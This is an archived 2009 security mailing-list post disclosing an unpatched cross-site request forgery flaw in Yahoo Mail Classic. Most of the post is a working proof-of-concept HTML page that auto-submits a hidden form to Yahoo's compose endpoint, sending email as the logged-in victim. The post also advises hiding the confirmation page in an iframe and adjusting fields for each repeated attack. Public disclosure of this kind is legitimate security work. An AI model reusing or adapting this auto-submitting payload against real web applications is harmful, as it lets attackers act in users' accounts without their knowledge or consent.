lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 23 Dec 2009 19:44:47 +0530
From: gaurav baruah <baruah.gaurav@...il.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Yahoo Mail Classic XSRF (still unpatched)

Yahoo Mail Classic XSRF (still unpatched)

Discovered by -
Sanjay Kumar (sanjay1519841@...il.com)
Gaurav Baruah (baruah.gaurav@...il.com)

A malicious attacker can entice a user to visit a specific URL and
then send emails on context of that user using XSRF.
Parameters - &.rand, clean&.jsrand, acrumb, mcrumb (which are most
likely tokens) are not validated during the request submission, which
causes XSRF to occur. These parameters have been removed in the
following HTML code, but the request still succeeds.

Although a “Message Sent” page is displayed after the POST request is
sent, this can be hidden by making use of an iframe to host the
specified page that was previously making the XSRF request.

Care has to be taken to change the following fields as required for
each subsequent attack, or the attack fails due to invalid data being
submitted.
jsonEmails & to (both contain the recipient address)
fromAddresses & defFromAddress ( both contain the source address)


Start of PoC.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body><form action="http://us.mc533.mail.yahoo.com/mc/compose?"
method="post" name="yahoo">
<input type="hidden" name="cmd" value="mask">
<input type="hidden" name="fromAddresses"
value="{"victim@...oo.com":{"address":"victim@...oo.com","frmName":"testuser","replyTo":"","type":"default","pop":""}}">
<input type="hidden" name="defFromAddress" value="victim@...oo.com">
<input type="hidden" name="to" value="user_to_send_email_to@...il.com">
<input type="hidden" name="jsonEmails"
value="{"user_to_send_email_to@...il.com":false}">
<input type="hidden" name="attachment" value="">
<input type="hidden" name="msgFlag" value="compose">
<input type="hidden" name="startMid" value="">
<input type="hidden" name="sMid" value="0">
<input type="hidden" name="pSize" value="">
<input type="hidden" name="nextMid" value="">
<input type="hidden" name="prevMid" value="">
<input type="hidden" name="fid" value="Inbox">
<input type="hidden" name="mid" value="">
<input type="hidden" name="oFid" value="">
<input type="hidden" name="oMid" value="">
<input type="hidden" name="sort" value="">
<input type="hidden" name="filterBy" value="">
<input type="hidden" name="order" value="">
<input type="hidden" name="msgID" value="">
<input type="hidden" name="ymcjs" value="1">
<input type="hidden" name="signatureAdded" value="1">
<input type="hidden" name="sUseRichText" value="dynamic">
<input type="hidden" name="sReplyToAddress" value="">
<input type="hidden" name="embstyle" value="">
<input type="hidden" name="st_desc" value="">
<input type="hidden" name="showBcc" value="false">
<input type="hidden" name="action_msg_send" value="Send">
<input type="hidden" name="cc" value="">
<input type="hidden" name="bcc" value="">
<input type="hidden" name="Subj" value="test">
<input type="hidden" name="togglePlainTxt" value="1">
<input type="hidden" name="Content" value="You have been XSRF-ed !!!">
</form>
<script>document.yahoo.submit();</script>
</body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists